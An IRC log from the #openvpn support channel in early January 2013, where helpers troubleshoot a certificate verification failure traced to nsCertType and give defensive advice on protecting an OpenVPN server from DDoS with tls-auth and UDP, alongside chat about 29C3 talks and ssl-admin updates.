17:38 -!- Porkepix [~Porkepix@lns-bzn-55-82-255-140-221.adsl.proxad.net] has quit [Ping timeout: 252 seconds]
17:40 -!- Porkepix [~Porkepix@lns-bzn-55-82-255-140-221.adsl.proxad.net] has joined #openvpn
17:57 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt]
18:12 <+dvl> using ssl-admin, I see crl.pem in the prog directory? that seems like I shouldn't be picking that up directly. But that's exactly what I plan to do.
18:33 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn
18:43 <@krzee> just make sure its new
18:57 <+dvl> Yeah, it is.
18:57 <+dvl> Got server started with new keys and ca.crt
18:57 <+dvl> but? client can't authenticate yet
18:58 <+dvl> server say: TLS Error: TLS handshake failed
18:58 <+dvl> client says: TLS_ERROR: BIO read tls_read_plaintext error: error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed
18:59 <+dvl> just verified cert on client: openssl verify -CAfile ca.crt client.crt
19:00 <+dvl> And done similar on server.
19:03 <+dvl> same issue, both server and client cert: openssl x509 -subject -issuer -noout -in client.crt
19:05 <+pekster> Read the client error more carefully: it's complaining about the server certificate (the one being presented to it from the server)
19:05 <+pekster> The client is failing to verify the cert presented over the wire against the locally configured CA cert file
19:07 <@krzee> md5 both ca.crt's
19:08 <@krzee> be sure they match (assuming they're supposed to, which they normally are)
19:09 <+dvl> both certs are valid from 2 jan, and it's 3 jan (utc)
19:09 <+dvl> yeah, I did that, will do it again
19:10 <+dvl> # md5 ca.crt | grep b45a9a69e954ea70cbfd7c3bb46537e0
19:10 <+dvl> MD5 (ca.crt) = b45a9a69e954ea70cbfd7c3bb46537e0
19:10 <+dvl> they match
19:10 <+dvl> pekster: I see what you mean.
19:11 <+dvl> pekster: so, I'm wondering how that's possible if the ca.crt file is the same .. .checking
19:11 <+pekster> Who says your server's currently used cert was actually signed by that CA?
19:11 <+pekster> ;)
19:12 <@krzee> !certinfo
19:12 <@vpnHelper> "certinfo" is run `openssl x509 -in -noout -text` for info from your cert file
19:12 <@krzee> err no
19:12 <@krzee> !certverify
19:12 <@vpnHelper> "certverify" is (#1) verify your certs are signed correctly by running `openssl verify -CAfile ` for client.crt and server.crt or (#2) also make sure you use the same ca.crt on both sides by checking their md5
19:12 <@krzee> that ^
19:12 <+pekster> Well, that could be updated to indicate that you need to check the *opposing* peer's cert against your *local* CA
19:13 <@krzee> pekster, ya but i dont wanna get confusing, anyone asking about this stuff should be using the same ca.crt on both sides
19:13 <+dvl> I've run verify already (see above), but I'll run it again.
19:13 <+pekster> dvl: No, you checked the *client* cert against the *client's* CA cert. That's not what you need to be doing
19:13 <@krzee> pekster, the ca.crt's match md5
19:14 <+pekster> So? The server doesn't check its own cert against the CA
19:14 <+dvl> pekster: we've already established that the ca.cert match
19:14 <+pekster> The client does
19:14 <@krzee> checking against local ca.crt IS checking against the other side
19:14 <@krzee> since they are the same exact ca.crt
19:14 <+pekster> Oh, if the CA's match and he did that on the server too?
19:14 <+pekster> k
19:14 <+pekster> nvm, I missed that part
19:14 <@krzee> right, needs to do it on server too
19:15 <+dvl> I ran verify before, on both client and server. Just ran it again.
19:15 <+dvl> I also checked that the openvpn.conf file referred to said ca.crt
19:16 <+dvl> Hmmm.
19:16 <+dvl> FWIW, this was a working configuration before I changed the certs
19:16 <@krzee> run ntpdate on both machines?
19:16 <@krzee> although the error should be different if it was time
19:17 <+dvl> yes
19:17 <+pekster> You checked directories? Sometimes if you do (or don't) use a 'cd' dir your relative path can be misleading
19:17 <+dvl> times match. just verified.
19:18 <@krzee> ^ same if you chroot 19:18 <+dvl> pekster: no relative paths in config file. I copy pasted the names and ran verify again. 19:18 <+pekster> Upping the verbosity might help too: verb 5 is a good place to start (not sure offhand if higher levels of debug verbosity, say 6-7 would be more helpful with TLS issues) 19:18 <+dvl> no chroot involved. 19:18 <+dvl> Bumping verb on client 19:18 <@krzee> i would never use more than verb 5, plaisthos might tho 19:19 <@krzee> since he digs in that code, and im a mere user 19:19 <+dvl> ahuh 19:19 <+dvl> openvpn[73944]: VERIFY nsCertType ERROR 19:19 <+pekster> There ya go 19:19 <+dvl> there you go? I bet it's the client, not hte server. 19:19 <+dvl> Fixing. 19:19 <@krzee> ahh 19:20 <@krzee> well depends how you look at it 19:20 <@krzee> the problem is the server cert, or the client config 19:20 <+pekster> That can be either. 'nsCertType' is a Netscape-era option; personally, I prefer using KU/EKU fields, but they all really do the same thing 19:20 <@krzee> although if you say the problem is client config, you may be open to MITM attacks 19:21 <@krzee> yep^ i say "may" because theres 2 ways to check it is signed as the server (what pekster said above) 19:21 <+dvl> I've been using ssl-admin for the first time. I *know* I created both certificates with the same steps. 19:21 <+pekster> krzee: I just hate "Netscape" crap in my certs :P (call me a purist if you like :D ) 19:21 <+dvl> S) Create new Signed Server certificate 19:21 <+dvl> I shall update my notes. 19:22 <@krzee> :D 19:22 <+dvl> Folks: I'm sure this is the problem. Thank you for bearing with me. :) 19:22 <+pekster> Well, ssl-admin apparently doesn't include the nsCertType X509 field. It's a dumb field anyway, in my not-so-humble opinion 19:22 <@krzee> yes it does 19:22 <@krzee> i added the option to it years ago 19:22 <@krzee> its the option: S 19:22 <+pekster> Ah. 
I suppose, if people use the tls-verify directive you'd need it 19:23 * pekster sometimes forgets most folks like helper-directives 19:24 <+dvl> success! 19:24 <+dvl> Thank you folks. FYI, I'm writing up a how-to. 19:24 <+dvl> GOod error. 19:25 <+dvl> I've also raised three tickets. 19:25 <+pekster> When in doubt, get more error verbosity ;) 19:25 <+dvl> [not related to tonight] 19:25 <+dvl> yes. Good plan 19:25 <+pekster> If that fails, open a beer and dig into the code :P (or find help) 19:25 <@krzee> oh maybe im wrong 19:25 <@krzee> i added whatever it was that makes nscerttype server work 19:25 <@krzee> whatever that was, lol 19:26 -!- F^4[A] is now known as F^4 19:26 <+pekster> Yea, that's nsCertType (or w/e the ANSI-name for that field is formally. I'm not OCD enough to find you the OID :D ) 19:26 -!- raidz is now known as raidz_away 19:27 <@krzee> ya niether of us care too much :D 19:28 <@krzee> im working at talking to 2 girls via sms on my phone 19:28 <@krzee> working AND talking* 19:28 <+pekster> Well, I'm watching a 1h talk from 29C3 on the Russian surveillance state. Maybe you're doing it right, I dunno :P 19:28 <+pekster> Some day maybe I'll have a gal that enjoys curling up and watching it too ;) 19:30 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:30 <@krzee> thats asking too mucg 19:30 <@krzee> much* 19:31 <@krzee> if you can find one who can deal with you watching those all night, shes good enough 19:31 <@krzee> lol 19:31 <+pekster> Could be. I've heard some good questions posed to the speakers from women at 29C3 too ;) 19:31 <@krzee> got the link handy? that sounds good 19:32 <+pekster> Talk ID: 5402 from http://mirror.fem-net.de/CCC/29C3/mp4-h264-HQ/ (the torrents are mighty fast, and I like taking pressure off the http mirrors.) 
Full event list here: https://events.ccc.de/congress/2012/Fahrplan/day_2012-12-27.en.html 19:32 <@vpnHelper> Title: Index of /CCC/29C3/mp4-h264-HQ/ (at mirror.fem-net.de) 19:33 <@krzee> thanks 19:33 <+pekster> J. Appelbaum's opening 'not my department' and the 'enemies of the state' were also good talks. If you're into PKI, the 'certificate authority collapse' was also a nice watch 19:34 <+pekster> Tons of good stuff from this year's conference 19:34 <@krzee> always good stuff at ccc 19:34 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 19:36 <+dvl> ls all up and running now 19:36 <+dvl> :) 19:37 <@krzee> o/ 19:37 <@krzee> hacking cisco phones… sounds fun! 19:38 <@krzee> <--- likes voip 19:38 <@krzee> shit i wanna see half of these 19:38 <@krzee> i gotta go out there some year 19:46 < kisom> Sucks harald didn't speak at 29C3 19:46 < kisom> In fact, there are no good GSM talks imo 19:47 < kisom> krzee: Need someone to go with? I know I do 19:50 < chrisb> does CCC equal chaos computer club? 19:50 <+pekster> Yea 19:51 -!- digilink [~digilink@unaffiliated/digilink] has quit [Quit: ZNC - http://znc.in] 19:54 <@krzee> sure, wanna pick me up in the caribbean? haha 20:16 < kisom> Cuba? 20:23 <@krzee> 15.3G scanned out of 381G at 3.38M/s, 30h46m to go 20:23 <@krzee> 15.3G resilvered, 4.01% done 20:40 < EugeneKay> k 20:42 < chrisb> krzee: zfs? 20:56 -!- Sorinan [~bcdonadio@177.18.136.35] has joined #openvpn 20:57 < Sorinan> there's a way to specify a command to run before any connection is made in OpenVPN client? 20:58 < Sorinan> or maybe something like ProxyCommand from SSH, to run a command and pipe the connection trough it? 
21:06 <@krzee> chrisb, yep 21:07 <@krzee> Sorinan, run the command whereever you start openvpn, and just run the command before you start openvpn 21:07 <@krzee> or have a look at the places scripts hook into openvpn and see if one is what you want 21:07 <@krzee> !script 21:08 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn 21:11 < Sorinan> krzee, and it's possible to pipe the openvpn connection through an existing connection? 21:12 < Sorinan> the idea is to automate things with network-manager, so having to create the connection manually beforehand isn't pratical 21:23 <@krzee> i have no idea what you mean 21:23 <@krzee> what existing connection…? 21:32 -!- peper [~peper@gentoo/developer/peper] has quit [Ping timeout: 244 seconds] 21:32 -!- kenyon [kenyon@darwin.kenyonralph.com] has quit [Ping timeout: 240 seconds] 21:33 < Sorinan> krzee, so, basically I can use the ProxyCommand feature in SSH to create a connection to a middleman, instruct this middleman to netcat my final server, and then use this connection to access the final server via SSH 21:33 < Sorinan> I was wondering if I could do something similar with openvpn 21:33 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds] 21:33 -!- peper [~peper@gentoo/developer/peper] has joined #openvpn 21:34 < Sorinan> in a nutshell: tell OpenVPN to create a SSH connection to a middleman, forward this connection to the final server, and use this pipe created to communicate 21:44 -!- kenyon [kenyon@darwin.kenyonralph.com] has joined #openvpn 21:53 -!- brute11k [~brute11k@89.249.230.141] has joined #openvpn 21:58 -!- Sorinan [~bcdonadio@177.18.136.35] has quit [Quit: Saindo] 22:03 -!- HyperGlide [~HyperGlid@222.211.121.189] has joined #openvpn 22:04 <+pekster> photo from a 29C3 talk on factoring RSA primes, disscussing in this case a 1024-bit pubkey: 
http://pekster.sdf.org/misc/bluffdale_power.png 22:05 <+pekster> I've been using larger for some time, but hopefully someone still using key sizes under 2k bits is re-thinking their usage now 22:07 <+pekster> (oh, image updated with a slide a moment later) 22:12 -!- baobei_ [~baobei@58.37.20.245] has quit [Read error: Connection reset by peer] 22:13 -!- baobei_ [~baobei@58.37.20.245] has joined #openvpn 22:17 -!- nikoc31337 [~maniac@adsl-26.176.58.244.tellas.gr] has joined #openvpn 22:17 < nikoc31337> hey 22:18 < nikoc31337> !welcome 22:18 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 22:18 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 22:18 < nikoc31337> I would like some info related openvpn server ddos protection. 22:18 < nikoc31337> anyone available to give me his lights? :P 22:21 <+pekster> nikoc31337: Your best bet when using X509 is to add a --tls-auth key between peers to prevent the abuse of resources by unauthenticated attackers. The manpage goes into detail on using this and what the technical advantages are that prevent wasting resources from external attackers 22:22 <+pekster> You can also run OpenVPN on a non-standard port (say, a high randomly-selected port.) UDP will also be better, especially when combined with the --tls-auth feature, since it's far less open to port-scanning attacks 22:30 < nikoc31337> Well, im running other hosting services at the moment. 22:31 < nikoc31337> And the company i have my servers on, offers ddos protection for port 80 and 443 22:32 <+pekster> Then I don't really get what you're asking. 
OpenVPN has some internal protection against the traditional threat of ddos, which is resource consumption and hanging connections. Use of --tls-auth and UDP reduces these impacts. If you want to do upstream filtering of apparent DDoS through your ISP, that's outside the scope of OpenVPN and I'm unclear what you mean if you're asking about that 22:32 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 22:32 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 22:32 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 22:32 -!- mode/#openvpn [+o krzee] by ChanServ 22:34 < nikoc31337> Im hearing all everywhere that VPN Services keep getting hitted by DDOS attacks. 22:35 < nikoc31337> Im planning on starting a VPN Service soon and this is a thing im stuck on. 22:36 < nikoc31337> If someone attack port 1194, would the server go down? 22:36 <+pekster> Depends on the scale of the DDoS. Your best bet if you're concerned about becoming a target (such as a high-profile server, etc) is to do exactly what I said above and use --tls-auth support and run on a non-standard port (something besides 1194 or 5000) 22:37 < nikoc31337> Hm, isn't the port shown on the customers? 22:37 <+pekster> If you have configs that will end up semi-public (to end-users, etc) then the port question is somewhat irrelevant since it would be easy to discover what other port you're using 22:37 < nikoc31337> Yeah.. 22:38 <+pekster> Did you read about --tls-auth in the manpage? I think that basically addresses the resource-exhaustion issue you're primarily concerned with 22:39 <+pekster> Otherwise, feel free to contract with your ISP to throttle requests if you get more than a specified number of new (non-existing) connections in a period of time. 
I can't help you with that since that would be an issue between you and your ISP 22:39 < Devastator> keep in mind that if your server is hit in a port that's used by another service, your server CAN go down as well, it's the nature of ddos attack, openvpn isn't to blame 22:39 < nikoc31337> yeah, im not planning on hosting something else -- than openvpn server. 22:40 < rkantos> just start off with cloud flare or similiar atleast :D 22:40 < nikoc31337> cloudflare is used for websites :P 22:40 < rkantos> yeah but you never know in this day and age if your 1TB memory server hosts everything you do ;) 22:41 < nikoc31337> :D 22:41 < rkantos> with some 10Gb/s cards, you can do quite the shit with one 4u server 22:42 <+pekster> Save money and buy our meta-basket: it's so good, it'll hold all your eggs without the need to ever worry about baskets again! 22:42 < rkantos> 32 cores, 512GB DDR, 4x10Gb/s ports 10-15k maybe? 22:42 < nikoc31337> Can the server run under port 443? 22:42 < nikoc31337> actually let the customers connect under port 443 22:42 < nikoc31337> which will be filtered 22:43 < rkantos> I'd think it can 22:43 <@krzee> !hmac 22:43 <@vpnHelper> "hmac" is (#1) The tls-auth directive adds an additional HMAC signature to all SSL/TLS handshake packets for integrity verification. Any UDP packet not bearing the correct HMAC signature can be dropped without further processing. The tls-auth HMAC signature provides an additional level of security above and beyond that provided by SSL/TLS. or (#2) openvpn --genkey --secret ta.key to make the tls 22:43 < rkantos> but it'll perhaps create some conflicts? 22:43 <@vpnHelper> static key , in configs: tls-auth ta.key # , 1 for client or 0 for server in the configs 22:43 < nikoc31337> you say? 22:43 <+pekster> rkantos: TCP is far more abusive and resource-consuming in early connections than UDP, and also has its own set of problems. 
Unless you need TCP, you shouldn't use it 22:44 <+pekster> !tcp 22:44 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 22:44 < nikoc31337> so, pekster 22:44 <@krzee> and with udp you can add hmac signatures 22:44 < rkantos> pekster: yeah 22:44 < nikoc31337> do you think it would create any conflicts 22:44 <@krzee> which is an anti layer 7 ddos feature 22:45 < nikoc31337> if it was running under port 443? 22:46 <+pekster> "conflicts" ? Not unless something else is using that port. A port is a number. You can run OpenVPN on UDP 443, TCP 443, UDP port 1, or UDP port 65535. It's just a number 22:46 < rkantos> well 443 is used by HTTPS.. 22:46 < nikoc31337> With traffic filtering. 22:46 <+pekster> I've no clue since I'm not your ISP and have no idea how your ISP filters 22:46 <+pekster> !notovpn 22:46 < rkantos> but ofcourse that doesn't matter for the client 22:46 <@vpnHelper> "notovpn" is "notopenvpn" is your problem is not about openvpn, and while we try to be helpful, you may have a better chance of finding your answer if you ask your question in a channel related to your problem 22:47 < rkantos> what is it with everybody on this channel knowing how to use the !-marks 22:47 < rkantos> or spawn them in an instant :D 22:47 <+pekster> rkantos: Becuase people who come here often ask the same questions our bot can answer 22:48 <+pekster> I'm not going to type out several answers explaing that I can't explain a question about an ISP I have never worked with before 22:48 < rkantos> yeayea, but why does everyone know the commands in an instant 22:48 <+pekster> I use dozens of them frequently. 
You can find a full list here: 22:48 <+pekster> !factoids 22:48 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 22:48 < nikoc31337> Thanks for the help pekster:) 22:49 <+pekster> nikoc31337: Yup. Ultimately I think you're better off using OpenVPN on UDP, change the port if you like (not really helpful, but maybe a little) and use --tls-auth. That's *probably* better than any filtering your ISP can do 22:50 <+pekster> If you need more than that, invest in hardware solutions or contract upstream (ISP, hosting provider, etc) for further protection closer to the Internet source 22:54 < nikoc31337> in your opinion the best OS to run the server on is? 22:54 <+pekster> !bestos 22:54 <@vpnHelper> "bestos" is the best os for openvpn is the one you are most comfortable with 22:54 < nikoc31337> that's cool 22:54 < nikoc31337> thanks a lot mate 22:54 <+pekster> Depends on what you want to do, really ;). I'd recommend a Linux or Unix varient, but that's just me personally 22:54 < nikoc31337> appreciate it :) 22:54 < nikoc31337> yeah im using centos:) 22:54 <@krzee> if you're worried about dos attacks you should be on udp 22:55 < rkantos> aren't most vpn services udp anyway? 22:55 <+pekster> Yea, that was my advise too; the ISP apparently offers some "filtering" service for select ports, but I'm guessing it's based on protocol (bound to those ports, perhaps) and not the ports themselves 22:55 < rkantos> or both 22:55 <@krzee> tcp cant use hmac sigs which means layer7 can be attacked 22:55 <@krzee> yep 22:56 < nikoc31337> do you think if i use the server with GUI admin panel 22:56 < nikoc31337> It would make the server unstable or something. 22:56 < nikoc31337> Generate of customer configs is easier with gui 22:56 <@krzee> if you must go that route, firewall the hell out of that crap 22:56 < rkantos> nikoc31337: cloudflare? 22:56 < rkantos> or wha 22:57 < nikoc31337> ? 
22:57 < rkantos> what kind of GUI you mean?
22:57 <@krzee> in fact maybe only run it on a separate vpn server ip that only you have pki into
22:57 <@krzee> and dont allow any ip forwarding to that interface
22:58 < nikoc31337> Yeah i had this on my mind
22:58 < nikoc31337> Admin web interface, is installed always when installing an access server?
22:58 <+pekster> krzee: Um, I just turned on tls-auth in a tcp-server configuration and it worked fine. You can still handshake across TCP, but the HMAC and packet-dropping feature works just fine
22:58 <@krzee> coulda sworn that was udp only!
22:59 <+pekster> Nope. it's applied right to the TLS channel directly
22:59 <+pekster> (think of it sorta like 802.1Q)
23:02 <+pekster> Remember that it's just TLS; the data channel itself doesn't have any extra signature added since the goal is to prevent abuse of resources handshaking, encoding, and decoding TLS traffic (which is computationally expensive.) Malicious handling of data-stream packets is detected via normal hashing methods and dropped as malformed, but that's far cheaper in terms of computing power
23:10 <@krzee> meh and the manual clearly says "on the udp/tcp port" i wonder where i got that false idea
23:10 -!- hounge [~andro@5.254.147.250] has joined #openvpn
23:13 <@krzee> so it always hashes the control channel packets
23:14 <+pekster> Well, the control channel is secured via X509 pubkey crypto. --tls-auth adds an *extra* symmetric-based hash on top of this so the receiver doesn't have to use (expensive) pubkey crypto to see if the sender knows the PSK
23:15 <@krzee> and stops something like slowloris-ovpn from existing
23:30 -!- hounge [~andro@5.254.147.250] has quit [Ping timeout: 256 seconds]
23:38 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds]
--- Day changed Thu Jan 03 2013
00:06 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 276 seconds]
00:14 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn
00:21 -!- cosmicgate-- [~cosmicgat@113.210.102.213] has joined #openvpn
00:23 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [Ping timeout: 252 seconds]
00:34 -!- AndroUser2 [~andro@5.254.147.182] has joined #openvpn
00:36 -!- Porkepix [~Porkepix@lns-bzn-55-82-255-140-221.adsl.proxad.net] has quit [Ping timeout: 252 seconds]
00:38 -!- cosmicgate-- [~cosmicgat@113.210.102.213] has quit [Ping timeout: 255 seconds]
00:38 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn
00:53 -!- AndroUser2 [~andro@5.254.147.182] has quit [Ping timeout: 272 seconds]
00:55 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has quit [Quit: Ex-Chat]
01:35 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has joined #openvpn
01:47 -!- F^4 is now known as Yawa
01:57 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has joined #openvpn
02:02 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
02:17 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 244 seconds]
02:36 -!- cosmicgate-- [~cosmicgat@113.210.102.213] has joined #openvpn
02:38 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [Ping timeout: 240 seconds]
02:40 -!- cosmicgate-- [~cosmicgat@113.210.102.213] has quit [Ping timeout: 240 seconds]
02:41 -!- cosmicgate- [~cosmicgat@198.147.22.172] has joined #openvpn
02:41 -!- HyperGlide [~HyperGlid@222.211.121.189] has left #openvpn ["Leaving..."]
02:48 -!- cosmicgate- [~cosmicgat@198.147.22.172] has quit []
03:13 -!- Porkepix [~Porkepix@lns-bzn-55-82-255-140-221.adsl.proxad.net] has joined #openvpn
03:23 -!- Denial [Denial@92.239.45.77] has joined #openvpn
03:40 -!- nikoc31337 [~maniac@adsl-26.176.58.244.tellas.gr] has quit []
04:17 -!- baobei_ [~baobei@58.37.20.245] has quit [Quit: Leaving]
04:21 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn
04:25 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Ping timeout: 248 seconds]
05:32 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
05:36 -!- dazo_afk is now known as dazo
05:43 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye]
05:44 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has quit [Remote host closed the connection]
06:53 -!- m0sphere` [~m0sphere@S01060018e78c9cff.cg.shawcable.net] has joined #openvpn
06:53 -!- m0sphere [m0sphere@S01060018e78c9cff.cg.shawcable.net] has quit [Read error: Connection reset by peer]
07:07 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
07:24 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
07:40 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
07:40 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Quit: Don't flap your BGP at me sonny]
07:53 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Remote host closed the connection]
07:57 -!- ag4ve [~ag4ve@96.26.67.194] has quit [Ping timeout: 245 seconds]
07:59 -!- ag4ve [~ag4ve@96.26.67.194] has joined #openvpn
08:04 -!- manitu [~Thunderbi@h-213.61.163.68.host.de.colt.net] has joined #openvpn
08:05 -!- zol_ [~z@del63-4-78-248-82-46.fbx.proxad.net] has joined #openvpn
08:06 < manitu> hi ho.. can i use openvpn as proxy?.. i tried it like that: get the google.com dns, "ip route add google_ip/32 via my_vpn_ip" and then "ping google.com" .. before i got an answer from google, after adding the route there is no answer anymore
08:08 <@dazo> manitu: no, openvpn is not a proxy .... openvpn is a VPN solution, which is completely different from what a proxy does
08:10 < manitu> dazo: i know.. but i have an ipsec network without any leftsubnet.. i want to connect to a server by openvpn to access the ipsec devices.. thats the problem if not every devices knows openvpn :/
08:10 < manitu> *device
08:10 <@dazo> then you need to learn about routing
08:12 < zol_> Is it interesting to put an 8192 rsa key ? ( not 1024 or 2048 default )
08:12 < zol_> or 4096
08:12 < manitu> yea.. but thats a problem, because in ipsec you need to define a "leftsubnet", so the ipsec server accepts traffic from this subnet.. but the server provider can't add any subnet in that "device" for me.. so i need to rewrite the source ip, like a proxy does.. i hoped that openvpn could manage that, if i define the destination address-range
08:14 < manitu> i also can connect to ipsec on the client, which is already connected to the central openvpn server.. but i'm thinking of "routing" this traffic as a really nice way.. and not every device needs the ipsec client
08:16 -!- nikoc31337 [~maniac@adsl-26.176.58.244.tellas.gr] has joined #openvpn
08:16 < nikoc31337> Hey, i have one question.
08:16 <@dazo> zol_: the stronger key, the longer it will take to crack it
08:16 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has quit [Ping timeout: 264 seconds]
08:16 < nikoc31337> Is it possible to generate client config
08:17 < nikoc31337> through the admin web gui?
08:17 <@dazo> nikoc31337: sounds like you should ask in !AS
08:17 <@dazo> !AS
08:17 <@vpnHelper> "AS" is please go to #OpenVPN-AS for help with Access-Server
08:17 <@dazo> (the community edition doesn't have any admin web gui)
08:17 < nikoc31337> Thanks !
08:17 <@dazo> no worries!
08:18 <@dazo> manitu: I have no experience with ipsec ... so I dunno how this leftsubnet works ....
08:26 -!- brute11k [~brute11k@89.249.230.141] has quit [Ping timeout: 265 seconds]
08:30 -!- brute11k [~brute11k@89.249.230.141] has joined #openvpn
08:33 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn
08:34 < manitu> dazo: going to try a NAT with iptables now.. i hope that works somehow.. and thank you :)
08:36 -!- pie__ [~pie_@unaffiliated/pie-/x-0787662] has joined #openvpn
08:37 < pie__> Is there a way to add an arbitrary lan ip to the vpn?
08:37 < pie__> So for example I could access 192.168.1.43 via 10.3.0.14 or somesuch
08:38 < pie__> this is on the server lan
08:40 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn
08:46 <@ecrist> dvl: ping - I replied to your email, update to ssl-admin in the pipe
08:46 < dvl-_> checking...
08:49 -!- plaisthos [~arne@kamera.blinkt.de] has quit [Changing host]
08:49 -!- plaisthos [~arne@openvpn/developer/plaisthos] has joined #openvpn
08:49 -!- ServerMode/#openvpn [+v plaisthos] by verne.freenode.net
08:49 -!- mode/#openvpn [-v plaisthos] by ChanServ
08:49 < dvl-_> updating
08:49 -!- Porkepix [~Porkepix@lns-bzn-55-82-255-140-221.adsl.proxad.net] has quit [Ping timeout: 255 seconds]
08:51 -!- plaisthos [~arne@openvpn/developer/plaisthos] has quit [Changing host]
08:51 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn
08:51 -!- mode/#openvpn [+o plaisthos] by ChanServ
08:51 <@ecrist> EugeneKay: ping - please contact mattock when you've time
08:51 -!- Porkepix [~Porkepix@lns-bzn-29-82-248-243-164.adsl.proxad.net] has joined #openvpn
08:53 < EugeneKay> Mrh
08:53 < EugeneKay> Like, by email?
08:54 * plaisthos can now no longer hide as "just a visitor without op/voice"
08:54 <@ecrist> lol
08:54 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
08:54 <@ecrist> EugeneKay: IRC/PM or email - he has a present for you
08:54 < EugeneKay> If he needs my address, `whois eugenekay.com`
08:55 <@ecrist> kk
08:55 < |Mike|> lol
08:55 <@ecrist> is your shirt size listed there, too?
08:55 < EugeneKay> Possibly, but XL is fine.
08:55 < |Mike|> xs!
08:56 -!- mode/#openvpn [+v EugeneKay] by ChanServ
08:56 <+EugeneKay> I must have reconnected at some point. I knew something was missing
08:56 <@mattock> EugeneKay: roger that
08:57 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Quit: Changing server]
08:57 <+EugeneKay> <3
08:59 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn
08:59 -!- mode/#openvpn [+o plaisthos] by ChanServ
09:22 < dvl-_> ecrist : typo in 1.0.5, see email
09:24 -!- StFS [~stefan@gagnasetur.ru.is] has left #openvpn []
09:24 <@ecrist> *grumble*
09:25 <@ecrist> ah, that's relatively minor, though.
09:26 < dvl-_> yeah... but it's conifiguration... ;)
09:36 < dvl-_> ecrist: Am I correct in seeing that the question: Can I move signing request (supernews.example.org.csr) to the csr directory for archiving? (y/n): ===> supernews.example.org.csr moved.
09:36 < dvl-_> ... is always ignored? I don't recall answering that question.
09:38 <@ecrist> in 1.0.5 it's answered as 'y' automatically when you use option 4
09:39 < dvl-_> Good.
09:39 <@ecrist> dvl-_: the config filename typo - been around for nearly 4 years in that state, you're the first to mention it
09:40 <@ecrist> not anticipating a flood of email
09:40 <@ecrist> ;)
09:41 < dvl-_> It's not been written up on FreeBSD Diary before. ;)
09:43 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn
09:44 <@ecrist> heh
09:49 < dvl-_> ecrist: I ran 1.0.5 and updated the post with the new 'screen shots'.
09:49 -!- manitu [~Thunderbi@h-213.61.163.68.host.de.colt.net] has quit [Quit: manitu]
09:52 <@ecrist> did the rest of my notes make sense?
09:56 <@ecrist> dvl-_: on freebsd, if you're using the openvpn port install, you can just use relative pathing in the config
09:57 <@ecrist> so, if you're putting your keys in /usr/local/etc/openvpn/keys, you can just have keys/ca.crt, etc
09:57 <@ecrist> the openvpn rc script adds the --cd option to the startup, and makes /usr/local/etc/openvpn the pwd
09:58 < dvl-_> ecrist: which will make chroot easier....
10:01 < dvl-_> ecrist: I've made that note in the post.
10:10 < dvl-_> ecrist: OK, ready to publish. Schedule for 9pm tonight.
10:10 <@ecrist> neat!
